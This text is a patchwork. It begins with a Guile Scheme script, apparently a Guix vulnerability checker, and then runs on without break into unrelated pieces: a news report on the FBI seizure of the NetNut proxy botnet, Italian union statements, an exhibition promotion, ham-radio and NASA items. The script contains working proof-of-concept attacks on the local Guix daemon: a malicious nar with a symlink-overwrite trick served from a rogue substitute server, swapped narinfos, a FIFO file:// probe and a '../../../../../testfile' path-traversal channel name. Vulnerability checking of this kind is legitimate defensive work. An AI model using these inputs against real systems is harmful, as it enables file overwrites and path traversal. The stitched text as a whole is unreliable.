;; of the derivation being computed, which means we'd have to gc it afterward.
(%graft? #f)
(define (package->path+narinfo store package)
(define path
(derivation->output-path (run-with-store store (lower-object package))))
(match (lookup-narinfos/diverse substitute-servers (list path)
valid-narinfo?)
((info) (values path info))
(() (values #f #f))))
(define (restore-file-vuln?)
(define-values (target-path target-info)
(call-with-values (lambda ()
(with-store store
(package->path+narinfo store
target-substitutable-package)))
(lambda (path info)
(unless info
(error "can't find substitutable path to test 'restore-file' with\n"))
(with-store store
(when (valid-path? store path)
(when (null? (delete-paths store (list path)))
(error "can't delete substitutable path to test 'restore-file' with\n"))))
(values path info))))
(define new-target-info-contents
(let* ((contents (narinfo-contents target-info))
(signature-index (string-contains contents "Signature:"))
(after-signature-index (string-index contents #\newline
signature-index))
(signed-contents (string-take contents (or after-signature-index
(string-length
contents)))))
(string-append signed-contents "
URL: example.nar
Compression: none
NarSize: 0\n")))
;; We can't delete target-file if it's owned by root, so overwrite it with
;; fresh, mostly-random contents each time, and check that the contents match.
(define test-contents
(format #f "VULNERABLE!~%~S:~S~%" (getpid) (random 100000000)))
(define test-nar
(call-with-output-bytevector
(lambda (port)
(for-each (lambda (s)
(write-string s port))
`("nix-archive-1"
"(" "type" "directory"
"entry" "(" "name" "a"
"node" "(" "type" "symlink"
"target" ,target-file ")" ")"
"entry" "(" "name" "a"
"node" "(" "type" "regular"
"contents" ,test-contents ")" ")"
")")))))
(define bad-request
(build-response #:code 400 #:reason-phrase "Unexpected request"))
(define target-uri-path
(string-append "/" (store-path-hash-part target-path) ".narinfo"))
(define nar-uri-path "/example.nar")
(define (handle request body)
(cond
((not (eq? (request-method request) 'GET))
(values bad-request ""))
((string=? (uri-path (request-uri request)) target-uri-path)
(format (current-error-port)
"Returning narinfo pointing to test nar~%")
(values (build-response #:code 200)
new-target-info-contents))
((string=? (uri-path (request-uri request)) nar-uri-path)
(format (current-error-port) "Returning test nar~%")
(values (build-response #:code 200)
test-nar))
(else
(values bad-request ""))))
(call-with-port (socket PF_INET SOCK_STREAM 0)
(lambda (sock)
(setsockopt sock SOL_SOCKET SO_REUSEADDR 1)
(bind sock (make-socket-address AF_INET INADDR_LOOPBACK 0))
(listen sock 5)
(let* ((port-number (sockaddr:port (getsockname sock)))
(substitute-url (string-append "http://localhost:"
(number->string port-number)
"/"))
(server-thread (call-with-new-thread
(lambda ()
(run-server handle http
`(#:socket ,sock))))))
(with-store store
(set-build-options store
#:substitute-urls (list substitute-url))
(guard (c ((store-error? c)
;; XXX doesn't actually cancel until something tries
;; connecting
(cancel-thread server-thread)
;;(join-thread server-thread)
(and (file-exists? target-file)
(string=? (call-with-input-file target-file
get-string-all)
test-contents))))
(build-things store (list target-path))
;; If the substitution actually completes without throwing then we
;; are most definitely vulnerable, but not just in 'restore-path'.
(error "!!!substitution of invalid nar completed???!!!")))))))
;; 2. fetch-narinfos
;; Identify two substitutable paths P1 and P2. Get P1 and P2's signed
;; narinfos, start an http server, connect to store, set substitute urls, ask
;; whether P1 and P2 are substitutable. Have http server serve P2's narinfo
;; when asked for P1's, and P1's when asked for P2's. If vulnerable, it will
;; report that both are substitutable, if not, it will report that neither
;; are.
;; We need two substitutable paths because the daemon<-->'guix substitute
;; --query' interface verifies that the info it gets back is for a path that
;; was requested, so the "replacement" path has to also be queried for
;; substitutability at the same time.
(define (fetch-narinfos-vuln?)
(define-values (hello-path hello-info)
(with-store store (package->path+narinfo store hello)))
(define-values (sed-path sed-info)
(with-store store (package->path+narinfo store sed)))
(define bad-request
(build-response #:code 400 #:reason-phrase "Unexpected request"))
(define hello-uri-path
(string-append "/" (store-path-hash-part hello-path) ".narinfo"))
(define sed-uri-path
(string-append "/" (store-path-hash-part sed-path) ".narinfo"))
(define (handle request body)
(cond
((not (eq? (request-method request) 'GET))
(values bad-request ""))
((string=? (uri-path (request-uri request)) hello-uri-path)
(format (current-error-port) "Returning sed when asked for hello~%")
;; Return the wrong result
(values (build-response #:code 200)
(narinfo-contents sed-info)))
((string=? (uri-path (request-uri request)) sed-uri-path)
(format (current-error-port) "Returning hello when asked for sed~%")
;; Return the wrong result
(values (build-response #:code 200)
(narinfo-contents hello-info)))
(else
(values bad-request ""))))
(unless (and hello-info sed-info)
(error "can't find substitutable paths to test 'fetch-narinfos' with"))
(call-with-port (socket PF_INET SOCK_STREAM 0)
(lambda (sock)
(setsockopt sock SOL_SOCKET SO_REUSEADDR 1)
(bind sock (make-socket-address AF_INET INADDR_LOOPBACK 0))
(listen sock 5)
(let* ((port-number (sockaddr:port (getsockname sock)))
(substitute-url (string-append "http://localhost:"
(number->string port-number)
"/"))
(server-thread (call-with-new-thread
(lambda ()
(run-server handle http
`(#:socket ,sock))))))
(with-store store
(set-build-options store
#:substitute-urls (list substitute-url))
(let ((substitutables
(substitutable-paths store (list hello-path sed-path))))
;; XXX doesn't actually cancel until something tries connecting
(cancel-thread server-thread)
;;(join-thread server-thread)
(not (null? substitutables))))))))
;; 3. file-uris
;; Create a fifo whose name is 32 nix-base32 characters followed by
;; ".narinfo", connect to store, set substitute urls to point to containing
;; directory, spawn a thread to block trying to open fifo write-only which
;; will subsequently set a flag and close the port, then ask whether some
;; store path with that hash is substitutable. It should fail in all cases.
;; Check whether the flag is set; if so, we're vulnerable, otherwise we're
;; not.
(define (file-uris-vuln?)
(call-with-temporary-directory
(lambda (directory)
(define testfifo
(string-append directory "/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.narinfo"))
(define opened? (make-atomic-box #f))
(define store-item
(string-append (%store-prefix) "/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-foo"))
(define open-thread
(begin
(mknod testfifo 'fifo #o744 0)
(call-with-new-thread
(lambda ()
(call-with-port (open testfifo O_WRONLY)
(lambda (port)
(atomic-box-set! opened? #t)))))))
(with-store store
(set-build-options store
#:substitute-urls (list (string-append "file://" directory)))
(guard (c ((store-error? c)
(cancel-thread open-thread)
(delete-file testfifo)
;; even though the file it is trying to open no longer
;; exists, the kernel doesn't give a result to open-thread
;; until someone ptraces it (or maybe sends a signal or
;; something).
;; (join-thread open-thread)
(atomic-box-ref opened?)))
(substitutable-paths store (list store-item))
(error "not supposed to get here!\n"))))))
;; 4. cache-key
;; Create a barebones git repository that is a valid channel, create a
;; <channel> that references it using a malformed name, set XDG_CACHE_HOME to
;; a directory inside a temporary directory (so that 'cache-directory' points
;; to a subdirectory of it), call authenticate-channel, see if a file outside
;; of XDG_CACHE_HOME gets created.
;; If you don't have Internet access, edit this to point to a local repository
;; containing at least commit 5a2d9baeda971df575c017669bca8eb8faa22ebd and its
;; ancestors, and the keyring branch.
(define guix-science-url
"https://codeberg.org/guix-science/guix-science.git")
(define (create-test-channel directory channel-name)
"Populate REPOSITORY with the necessary contents for it to be a valid
channel with 2 commits, then return three values: a <channel> for it with name
CHANNEL-NAME and an introduction to the first commit, the first commit, and
the second commit."
(define intro-commit
"b1fe5aaff3ab48e798a4cce02f0212bc91f423dc")
(define end-commit ;; The commit following intro-commit
"5a2d9baeda971df575c017669bca8eb8faa22ebd")
(define fingerprint
"CA4F 8CF4 37D7 478F DA05 5FD4 4213 7701 1A37 8446")
(define git %git) ;; From (guix config), guix has a hard dependency on git
(with-directory-excursion directory
(invoke git "init"
;; Silence warning
"--initial-branch=main")
(invoke git "remote" "add" "--" "origin" guix-science-url)
(invoke git "fetch" "--" "origin" end-commit)
(invoke git "checkout" "FETCH_HEAD")
(invoke git "fetch" "--" "origin" "refs/heads/keyring:keyring")
(values
(channel
(name channel-name)
(url (canonicalize-path directory))
(introduction (make-channel-introduction
intro-commit
(openpgp-fingerprint fingerprint))))
intro-commit
end-commit)))
(define (cache-key-vuln?)
(call-with-temporary-directory
(lambda (directory)
(let ((home (string-append directory "/home"))
(channel-repo (string-append directory "/channel-repo"))
(testfile (string-append directory "/testfile")))
(mkdir home)
(mkdir channel-repo)
(with-environment-variables `(("HOME" ,home)
("XDG_CACHE_HOME" ,(string-append home
"/.cache")))
(call-with-values
(lambda ()
(create-test-channel channel-repo
(string->symbol "../../../../../testfile")))
(lambda (channel first-commit last-commit)
(authenticate-channel channel channel-repo last-commit
#:keyring-reference-prefix "")))
(file-exists? testfile))))))
;; Results
(define vulnerabilities
(list (list "restore-file" restore-file-vuln?)
(list "fetch-narinfos" fetch-narinfos-vuln?)
(list "file-uris" file-uris-vuln?)
(list "cache-key" cache-key-vuln?)))
(define (call-with-errors-to-string proc)
(define tag (make-prompt-tag))
(call-with-prompt tag
(lambda ()
(with-throw-handler #t
proc
(rec (self key . args)
(let* ((stack (make-stack #t
1 ;self ;; Causes make-stack to return #f??
tag
))
(frames (stack-length stack))
(frame (stack-ref stack 0)))
(define error-string
(match args
(((or (? string? proc) (? symbol? proc))
(? string? message) (args ...) . rest)
(call-with-output-string
(lambda (port)
(display-error frame port proc message args
rest))))
(args
(call-with-output-string
(lambda (port)
(print-exception port frame key args))))))
(display-backtrace stack (current-error-port))
(display error-string (current-error-port))
(abort-to-prompt tag (string-append "error: "
(string-trim-both
error-string)))))))
(lambda (_ . args)
(apply values args))))
(define results
(map (match-lambda
((name proc)
(list name (if (string? proc)
proc ;; pass message through
(call-with-errors-to-string proc)))))
vulnerabilities))
(for-each (match-lambda
((name vulnerable?)
(format #t "~a: ~a~%"
name
(if (boolean? vulnerable?)
(if vulnerable? "vulnerable" "not vulnerable")
vulnerable?))))
results)
(exit (if (any second results) 1 0))The Federal Bureau of Investigation (FBI) said today it worked with industry partners to seize hundreds of domains associated with NetNut, a sprawling residential proxy service operated by the publicly-traded Israeli company Alarum Technologies [NASDAQ: ALAR]. The action comes roughly two weeks after KrebsOnSecurity published findings from multiple security firms connecting NetNut to the Popa botnet, a collection of at least two million devices that have been compromised by malicious software with little or no consent from victims.

The NetNut homepage today was replaced by this seizure banner from the FBI.
On June 19, three different security firms issued similar findings: That NetNut is a residential proxy network which populates a botnet called Popa, and distributes software for devices commonly found in homes, such as smart TVs and streaming boxes. NetNut’s software turns those systems into always-on residential proxy nodes that are rented to others, who predominantly use them to relay abusive and intrusive Internet traffic, such as mass content scraping, advertising fraud, and account takeover activity.
Earlier today, NetNut’s homepage was replaced with a seizure notice from the FBI and the Internal Revenue Service Criminal Investigation division. The seizure notice thanked Google, Lumen, Shadowserver and other industry partners for their help in dismantling hundreds of domains tied to the Popa botnet, which experts say has long been synonymous with NetNut’s residential proxy infrastructure.
In a blog post published today, the Google Threat Intelligence Group (GTIG) said NetNut’s proxy network is widely resold and white-labeled by a number of third-party proxy providers, and that its services are heavily sought out by cybercriminals seeking to obfuscate the source of their malicious traffic. The GTIG said that in a single week during June 2026, they observed 316 distinct clusters of threat actors using suspected NetNut exit nodes, including cybercriminal and espionage groups.
“These bad actors can use NetNut to mask their origin IP address when accessing victim environments, accessing their own infrastructure, and conducting password spray attacks,” Google’s GTIG wrote. “Furthermore, when a consumer device becomes an exit node, unauthorized network traffic passes through it. This means bad actors can access other private devices on the same home network, effectively exposing them to Internet threats.”
Google said it disabled Google accounts and services used by NetNut for malware command and control, and that it shared technical intelligence on NetNut’s software development kits (SDKs) and backend infrastructure with platform providers, law enforcement and research firms. The company also disabled apps known to bundle NetNut’s various SDKs.
Omer Weiss, legal counsel for NetNut parent Alarum Technologies, said the company was aware of the FBI seizure and cooperating with investigators.
“Alarum takes this matter seriously and will fully cooperate with law enforcement to ensure any misuse of its infrastructure is thoroughly investigated and those responsible are held to account,” Weiss said in a written statement.
Benjamin Brundage is founder of the proxy tracking service Synthient, one of the companies that published evidence last month linking the Popa botnet to NetNut and Alarum Technologies. Brundage said the domain seizures appear to have disrupted both the Popa botnet and the NetNut proxy network that rides on top of it.
Brundage said NetNut’s apparent demise is likely to be a great disadvantage for the cybercrime community, which was already reeling from legal actions by Google earlier this year that seized infrastructure for NetNut’s biggest competitor — IPIDEA.
“I think this takedown is going to have a big impact, because NetNut gained significant popularity after the IPIDEA takedown,” he said. “Also NetNut has been incredibly common among resellers, and they were on par with IPIDEA in terms of their daily traffic, quality, size, price per gigabyte, all of it.”

NetNut’s infrastructure, in a nutshell. Image: Black Lotus Labs, Lumen.
The NetNut and Popa botnet takedown may have another added benefit, Brundage said: Lessening the impact of large distributed denial-of-service botnets that have been built on the backs of poorly configured residential proxy services. In January, Synthient revealed how cybercriminals had built the world’s largest DDoS botnet (Kimwolf) by tunneling through IPIDEA proxy connections into the local networks of TV box owners, and infecting other Android-based devices behind the victim’s firewall.
While many of the bigger proxy providers took steps to block this activity, resellers of the major proxy networks have been far slower to respond to the threat, Brundage said.
“In terms of all these TV box devices getting compromised from the proxy network, it will have an impact on the DDoS botnets out there,” he said.
For its part, Google reckons today’s actions have caused “significant degradation to NetNut’s proxy network and its business operations, reducing the available pool of devices for the proxy operator by millions.” But the company warns that proxy networks can rebuild themselves by effectively reselling other proxy services, as IPIDEA has done over the past few months.
“Google has high confidence that many popular residential proxy brands are in fact whitelabeling the NetNut botnet,” the GTIG report concludes. “While we expect this disruption to have a larger ripple effect across the residential proxy ecosystem, observations after the disruption of IPIDEA proved that individual networks can appear resilient. What we have observed is that when faced with the degradation of their own botnet, proxy operators begin buying capacity from their competitors, effectively becoming a reseller. We recognize that creating a lasting disruption in this fluid ecosystem means we must scale our efforts to target the infrastructure of several interconnected providers.”
As KrebsOnSecurity has warned repeatedly, most of the no-name TV streaming boxes for sale on the major e-commerce websites either come pre-installed with residential proxy software, or require the installation of proxy SDKs in order to use the device for its stated purpose (streaming pirated movies, sporting events and TV shows). Google’s advice here is sound: When it comes to TV boxes, stick to name brands from reputable manufacturers, and then be sparing and judicious with any apps you choose to install.
The sketchy TV boxes that are being commandeered by the Popa botnet and other threats all come with or require the user to install unofficial Android operating systems that do not operate within the confines of Google’s Official Play Protect store. Google says consumers can confirm whether or not a device is built with the official Android TV OS and Play Protect certification by following these instructions.
Even people without TV streaming boxes can find their smart TVs enrolled in residential proxy networks, just by installing one of thousands of apps available for download on Samsung and LG smart TVs. In a report released last month, the proxy tracking company Spur found 42 percent of apps available for download via the webOS operating system on LG smart TVs include SDKs that turn one’s television into an always-on residential proxy node. More than a quarter of the apps made for Samsung’s Tizen operating system had similar residential proxy components, Spur found.

Image: Spur.us.
Update, 4:24 p.m. ET: Included a statement shared post-publication from an attorney representing NetNut parent Alarum Technologies.
Update, July 8, 2:34 p.m. ET: The website for Alarum Technologies — alarum[.]io — now also features a seizure notice from the FBI. The company’s stock has taken a beating since the FBI action, and is currently trading at $2.62 a share, a roughly 67 percent decline over the past week.



L’1 e il 2 luglio si è riunito a Roma, presso la sede GARR, il Board of Directors di GÉANT, l’organo di governo responsabile della direzione strategica e approvazione dei piani di attività della associazione e della supervisione dell’organizzazione.
Dal 1° luglio Piaggio aprirà l'ennesima procedura di solidarietà. Ancora una volta saranno gli operai a pagare il prezzo delle scelte aziendali, con meno salario e meno prospettive. Ma la situazione è ancora più grave.
Da domani iniziano le fermate delle linee in diversi reparti. Alcune produzioni termineranno già a metà luglio. Il lavoro manca. E non manca per una fatalità o per una crisi improvvisa. Manca perché da anni è assente una vera strategia industriale. Gli investimenti vengono rinviati, i nuovi progetti non arrivano e lo stabilimento viene lasciato vivere alla giornata, senza una prospettiva di rilancio.
Solo poche settimane fa si celebravano gli ottant'anni della Vespa. Discorsi, fotografie, autorità e applausi raccontavano l'eccellenza italiana e un marchio simbolo nel mondo. Finita la propaganda, però, resta la realtà: fermate produttive, solidarietà, salari che diminuiscono e un futuro sempre più incerto. È questa la distanza tra la narrazione e ciò che gli operai vivono ogni giorno.
Piaggio continua a utilizzare gli ammortizzatori sociali come uno strumento ordinario di gestione, trasferendo sui lavoratori e sulla collettività il costo delle proprie scelte. È inaccettabile che si continui a ricorrere alla solidarietà senza assumersi la responsabilità di rilanciare davvero il sito di Pontedera.
Per USB la solidarietà non può tradursi in un taglio dello stipendio. Se l'azienda sceglie questa strada, deve garantire l'integrazione salariale. Gli operai non possono diventare il bancomat a cui attingere ogni volta che vengono meno programmazione, investimenti e visione industriale.
Anche questa volta tutto viene deciso all'ultimo momento. I lavoratori vengono convocati quando le decisioni sono già state prese, senza un confronto reale e senza una trattativa vera. Si chiede soltanto di ratificare un accordo già scritto.
Negli anni questo metodo è stato presentato come responsabilità. In realtà ha finito per trasformare la responsabilità in semplice accettazione delle decisioni aziendali. Ogni sacrificio viene descritto come inevitabile, ogni arretramento come necessario, ogni accordo come il migliore possibile.
Ma il compito di un delegato sindacale non è accompagnare i lavoratori ad accettare nuovi sacrifici. È rappresentarli, difenderne il salario, contrastare le scelte sbagliate e pretendere investimenti e prospettive. Quando invece si firma tutto, si giustifica tutto e si invita sempre e soltanto ad avere pazienza, si smette di rappresentare gli operai e si finisce per assecondare un modello che punta a una fabbrica senza conflitto e a lavoratori sempre più ricattabili.
Gli accordi al ribasso non hanno salvato il futuro dello stabilimento. Lo hanno progressivamente indebolito. Ogni firma che ha ridotto diritti e tutele è stata giustificata in nome del domani.
Quel domani oggi è sotto gli occhi di tutti: esuberi, fermate produttive, solidarietà e assenza di una prospettiva industriale.
Anche la politica porta una responsabilità enorme. Quando c'è da inaugurare una mostra sulla Vespa o partecipare a una celebrazione, le istituzioni sono sempre presenti. Quando invece occorre pretendere investimenti, difendere l'occupazione e chiedere conto delle scelte industriali della proprietà, prevalgono il silenzio e l'inerzia. Da anni Comune, Regione e Governo assistono senza intervenire al progressivo indebolimento dello stabilimento. Si evita di mettere in discussione la proprietà e di aprire un confronto serio sul futuro industriale di Pontedera. Eppure è compito delle istituzioni pretendere un piano industriale credibile, vincolare gli incentivi pubblici agli investimenti e garantire un confronto permanente sul futuro produttivo del territorio. Il lavoro si difende con gli atti, non con le fotografie.
Per questo non possiamo accettare che gli ammortizzatori sociali diventino una componente strutturale del modello Piaggio, né che siano sempre gli operai a pagare il prezzo delle scelte aziendali. Allo stesso modo, il sindacato non può ridursi a certificare decisioni già prese. Serve rompere un equilibrio costruito sul silenzio, sulla rassegnazione e sulla continua ricerca della pace sociale.
La storia del movimento operaio insegna una cosa semplice: nessun diritto è stato regalato. Tutto è stato conquistato attraverso il conflitto. Chi rinuncia al conflitto finisce inevitabilmente per accettare l'arretramento dei diritti e le decisioni dell'azienda. Ed è proprio questa scelta a rendere sempre più evidente da quale parte si decide di stare. Chi oggi invita ad abbassare la testa non sta difendendo il lavoro. Sta soltanto rendendo più semplice il compito di chi vuole continuare a ridurre salari, diritti e occupazione.
Per questo il primo passo è ricostruire partecipazione, consapevolezza e organizzazione. È il momento di scegliere da che parte stare. Noi, come sempre, stiamo dalla parte degli operai.
CHI FIRMA LA RESA È PARTE DEL PROBLEMA.
I DIRITTI NON SI FIRMANO. SI CONQUISTANO CON LA LOTTA.
RSU USB PIAGGIO

Nella giornata di ieri una delegazione dei collettivi, sindacati e partiti che da anni lottano contro la militarizzazione del nostro porto e la complicità della nostra città con le guerre americane e israeliane ha incontrato il presidente dell’Autorità di Sistema Davide Gariglio e il dirigente demanio portuale Marilli. Incontro richiesto durante la recente manifestazione di protesta davanti a Palazzo Rosciano.
Abbiamo nuovamente espresso la nostra forte opposizione rispetto alla possibilità che l’azienda Drass, che dovrà produrre sottomarini da guerra per il governo indonesiano, possa ricevere in concessione spazi del nostro porto per i test di questi sottomarini.
Sappiamo inoltre che le concessioni per gli spazi che si stanno liberando in porto verranno rilasciate per periodi che raggiungono anche i dieci anni, motivo di ulteriore preoccupazione qualora aziende impegnate nella filiera bellica dovessero appropriarsene, rendendo di fatto il nostro porto luogo di produzione e test di mezzi destinati alla guerra.
Le ragioni che sono state espresse, a sostegno della nostra posizione, non hanno solo un carattere etico e politico. Basterebbero quelle. Ma anche economiche ed occupazionali. I traffici e le attività civili, ormai è ampiamente noto, hanno un’incidenza occupazionale ben maggiore. Inoltre, vi sono anche ragioni legate alla sicurezza dei lavoratori portuali e non solo.
Al netto di quali saranno le decisioni dell’Autorità e i bandi di assegnazione che usciranno siamo pronte e pronti a dare battaglia come tante altre volte, ricordando sempre che la guerra non è fatta solo di bombe e proiettili, ma anche e soprattutto di logistica, mezzi di trasporto e demolizione, come i caterpillar israeliani che fermammo a settembre al molo Italia.
Potere al Popolo
Attac Livorno
USB Livorno

C’è un nuovo motivo per fare un salto a Milano Sesto quest’estate.
Ha aperto Jurassic World: The Experience, la grande esperienza immersiva ufficiale dedicata alla celebre saga cinematografica che trasporta i visitatori nel mondo di Isla Nublar, tra dinosauri a grandezza naturale, scenografie spettacolari e ambientazioni ispirate ai film.
Dopo aver conquistato città come Londra, Madrid e Bangkok, l’esperienza arriva per la prima volta in Italia e sceglie MilanoSesto, a Sesto San Giovanni, come unica tappa italiana. L’evento sarà visitabile fino al 10 gennaio 2027.

Un viaggio nel mondo di Jurassic World
Non si tratta di una semplice mostra. Jurassic World: The Experience è un percorso immersivo che permette di entrare nelle ambientazioni iconiche della saga cinematografica, incontrando dinosauri animatronici a grandezza naturale e ricostruzioni fedeli dei laboratori e delle aree del parco.
Durante la visita si attraversano alcune delle location più famose del film. Tra queste ci sono gli iconici cancelli di Jurassic World, il laboratorio di creazione dei dinosauri e la valle popolata da gigantesche creature preistoriche. Inoltre, non mancano effetti speciali, suoni e scenografie che rendono l’esperienza ancora più coinvolgente.

Un’esperienza per grandi e piccoli
L’attrazione è pensata per tutta la famiglia. I bambini potranno osservare da vicino dinosauri come il Triceratopo, il Velociraptor e il maestoso Tyrannosaurus Rex, mentre gli adulti ritroveranno le atmosfere della saga cinematografica iniziata con Jurassic Park.
Grazie agli animatronici, agli effetti sonori e alle installazioni interattive, la visita permette di vivere un’avventura che va oltre la classica esposizione museale. Per questo motivo è una delle esperienze più attese dell’estate nell’area milanese.

Dove si trova e quando visitarla
Jurassic World: The Experience è allestita nell’area MilanoSesto, in viale Italia 576 a Sesto San Giovanni.
Per prenotare è possibile consultare il sito ufficiale dell’esperienza:
https://jurassicworldexperience.com/it/
Credits Photo
sito Jurassicworldexperience.com
Info Milano
L'articolo Jurassic World a Milano: unica tappa italiana proviene da InfoMilano.news.
Mailman è un software libero per la gestione delle discussioni via mail e le liste di distribuzione. Mailman è integrato con il web, al fine di semplificare agli utenti la gestione degli account e agli ai proprietari (owners) l'amministrazione delle liste. Mailman comprende come parte integrante il sistema di archiviazione, il processamento automatico dei rimbalzi (bounce), il filtro dei contenuti, la spedizione dei digest, filtri anti spam, e altro.
Mailman è un software libero distribuitosotto la GNU General Public License, e scritto nel linguaggio di programmazione Python.


Negli ultimi giorni USB Livorno ha inviato decine di segnalazioni, diffide e denunce agli organi competenti in merito al rischio elevato di stress termico per i lavoratori. Parliamo principalmente di piazzali all’aperto e capannoni industriali.
Sono già diversi i malori registrati, almeno due presso la fabbrica Trelleborg in via March e su un piazzale gestito dalla Porto2000.
In porto, per ben due volte, lavoratori e RLS hanno interrotto temporaneamente le operazioni di carico cellulosa in stiva, dopo aver constatato temperature insopportabili. I'8 luglio si riunirà, presso l'Autorità di Sistema, il comitato salute e sicurezza proprio su questo tema.
Richieste di intervento urgente sono state inviate presso alcuni piazzali di logistica come MVN, magazzini, ad esempio DHL, Fondazione Goldoni, Solvay, Magna Closures Le richieste sono sempre le medesime ma trovano costantemente l’opposizione dei datori di lavoro. Sospensione delle attività, pause aggiuntive, locali idonei e attrezzati per abbattere le temperature durante lo stop alle attività, cambi turno e nei casi limite accesso alla cassa integrazione così come previsto dai protocolli.
Il riferimento chiaro è l’indice calcolato tra temperatura e umidità. Se si supera una certa soglia i lavoratori devono essere messi in sicurezza. Purtroppo, nella stragrande maggioranza dei casi, senza l’intervento tempestivo del sindacato o dei rappresentanti dei lavoratori per la sicurezza le aziende tendono a garantire la produzione a tutti i costi a discapito della salute e della sicurezza dei lavoratori.
In questo senso, oltre ad invitare i lavoratori e le lavoratrici a contattare la nostra organizzazione sindacale in caso di necessità, crediamo sia urgente prevedere meccanismi automatici di intervento in caso di rischio stress termico e relative sanzioni per le aziende che non rispettano le procedure. L’ordinanza regionale è limitata solo ad alcuni settori mentre nelle fabbriche e nei piazzali portuali e della logistica si mette a rischio la vita. Così come in tanti altri luoghi di lavoro.
Usb Livorno

Am zweiten Juli-Wochenende funkt das Schweizer Nationalteam unter dem Rufzeichen HB9HQ um den Einzug in die Top Ten.
Am Samstag, 11. Juli 2026, exakt um 14.00 Uhr Schweizer Sommerzeit, fällt der Startschuss. 24 Stunden lang läuft die «IARU HF World Championship». Die USKA schickt wie jedes Jahr die Headquarter-Station HB9HQ ins Rennen, um die Schweiz im globalen Gesamtklassement möglichst weit nach vorne zu bringen. Ziel für 2026 ist das Knacken der Top-Ten-Ränge.
Strategie
Das Prinzip dieses sportlichen Grossereignisses verlangt strategisches Geschick. Die über 160 Landesverbände der International Amateur Radio Union schicken ihre HQ-Stationen auf die Jagd nach Punkten. In der Luft herrscht dann dichtes Gedränge. Wer HB9HQ anruft, loggt einen wertvollen Multiplikator. Die offiziellen Verbandsstationen senden neben dem üblichen Signalrapport das Kürzel ihrer Landesverbände, im Schweizer Fall also «USKA». Andere Nationen antworten mit «DARC», «ARRL» oder «JARL». Eine Besonderheit gilt für Funktionäre des Weltverbandes. Die Vorstands- und Aufsichtsratsmitglieder verteilen als Multiplikatoren ihre jeweilige Region. So sendet beispielsweise IARU Region 1-Kassier Andy HB9JOE den Zusatz «R1» für die IARU-Region 1.
Für alle gewöhnlichen Teilnehmerinnen und Teilnehmer gilt eine andere Regel. Sie tauschen im QSO neben der Signalstärke die ITU-Zone ihres Standorts aus. Wer von Schweizer Boden aus funkt, übergibt die Ziffer «28». Der Rapport lautet im Idealfall 5928 in Phonie oder 59928 in Telegrafie. Beim modernen Remote-Betrieb entscheidet übrigens nicht der Sitzplatz des Operateurs vor dem Bildschirm, sondern der physische Standort der Antenne, die das Signal in die Ionosphäre schickt.
Jedes QSO zählt
Der Erfolg des Schweizer Nationalteams hängt massiv von den hiesigen Funkamateurinnen und Funkamateuren ab. Jedes einzelne QSO aus der Schweiz stärkt dem Team den Rücken. Die genaue Aufteilung, welche Funkteams auf den Bändern von 160 bis 10 m in welchen Betriebsarten (CW und SSB) das Rufzeichen HB9HQ benützen, ist auf der USKA-Website aufgeführt. Wer teilnimmt, sammelt Punkte für das beliebte HB9HQ-Award, das die USKA wieder in vier Leistungsklassen ausgibt.
Weitere nützliche Links:
Viel Glück
Andy, HB9JOE
Leiter Radiosports der USKA
Published: HB9HGH 2026-07-01 15:02:14

A un anno dall'insediamento
Gianluca Mazzini, IK4LZH

Siamo arrivati al primo anno dall’insediamento di questo Consiglio Direttivo Nazionale. Un anno certamente non semplice. E, devo dirlo con sincerità, anche abbastanza diverso da come me lo ero immaginato. Pensavo che avremmo potuto concentrare molte energie sull’innovazione, sulle novità, su nuovi progetti, muovendoci in uno scenario consolidato e relativamente ordinato. Invece ci siamo trovati, molto più spesso, a doverci occupare della gestione quotidiana, dell’ordinario, delle pendenze, delle urgenze, delle tante piccole e grandi cose che permettono all’Associazione di funzionare.
Credo sia giusto parlarne. Anzi, credo sia doveroso.
Perché siamo volontari. Tutti noi prendiamo le attività del CDN per quello che sono: un servizio reso all’Associazione, accanto al nostro lavoro, ai nostri affetti, alle nostre famiglie, alle nostre attività personali. E accanto alla nostra passione, che resta prima di tutto la radio. Prima dell’associazionismo, prima della gestione, prima delle carte, delle email, dei verbali, dei conti, delle scadenze.
La radio è il motivo per cui siamo qui.
Con questa premessa, è doveroso parlare anche delle ragazze e dei ragazzi di ARI. Sono splendidi. E se molte cose funzionano, funzionano grazie a loro.
Un tempo erano molti di più. Poi, con gli anni, il numero delle persone operative è diminuito, per motivi diversi, non sempre facili da capire fino in fondo. Anche quando, nelle gestioni precedenti, si è cercato di rafforzare la struttura, non è stato semplice riuscirci. Non per disattenzione, ma per oggettiva complessità.
3 min read

Flight testing is a team sport. For nearly 80 years, teams at NASA’s Armstrong Flight Research Center in Edwards, California, have used flight testing to push the limits of aerodynamics and advance aviation.
Earlier this year, NASA’s Crossflow Attenuated Natural Laminar Flow (CATNLF) initiative tested a wing concept that would maximize the smooth flow of air known as laminar flow, which could lower fuel costs for future airliners. During flight testing, researchers strapped a scale-model CATNLF wing to the bottom of a NASA F-15 aircraft.
Here’s what a day of CATNLF flight testing looked like.

Ground crews ready the aircraft for the mission. If the operation involves a chase plane — a second aircraft to monitor the test flight — it would also be prepared, along with its crew.
Pilots, engineers, maintenance techs, project leads, researchers, photographers, and videographers meet to review the flight’s goals, weather reports, and final details.

Researchers head to the control room to complete day-of checks, confirming all communications, displays, and instruments are functioning.
Pilots suit up in life support, including custom‑fit pressure suits, harnesses, helmets, and masks. If a photographer, videographer, or flight test engineer will be in the aircraft’s back seat, they do the same.
The pilot completes preflight checks with the crew chief and technicians for the aircraft’s electrical systems. The pilot and the crew chief sign a flight preparedness report confirming the aircraft is ready to fly.
Inside the control room, the team prepares to monitor the flight using the same set of test cards, a step-by-step plan for the flight.
The pilot and backseat crew member climb into their seats, strap in, and secure any gear they’ve brought for the test. The pilot completes preflight ground checks.
The pilot communicates with the control tower and taxis to the runway. Control room teams at NASA Armstrong monitor the aircraft via radio.
The pilot accelerates down the runway and, at the proper speed, pulls back on the stick to take off. Once airborne, the pilot coordinates with air traffic control at Edwards Air Force Base and the NASA Armstrong control room while flying to the designated test area.

At the test location, the team coordinates with the pilot on altitude, speed, and maneuvers. The test conductor relays each task, and the pilot completes them one-by-one. The pilot and control room monitor the performance of the hardware, instruments, aircraft, or software throughout the sequence. After completing the test points, the pilot returns to base.
The pilot lands and taxis to the ramp at NASA Armstrong, where the crew chief meets the jet. After the pilot exits, the aircraft is towed into the hangar for maintenance.
The pilot, project team, and mission controlstaff return to the briefing room tocapture lessons learned and document items for follow-up.
Teams download flight data for analysis. If two flights are scheduled, preparations begin immediately for the second.



